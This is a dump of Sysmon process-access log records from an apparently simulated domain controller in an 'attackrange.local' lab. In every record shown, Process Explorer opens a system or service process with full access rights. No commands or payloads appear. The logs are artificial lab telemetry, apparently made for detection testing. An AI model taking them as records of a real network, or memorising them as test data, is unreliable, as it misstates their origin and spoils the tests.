15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 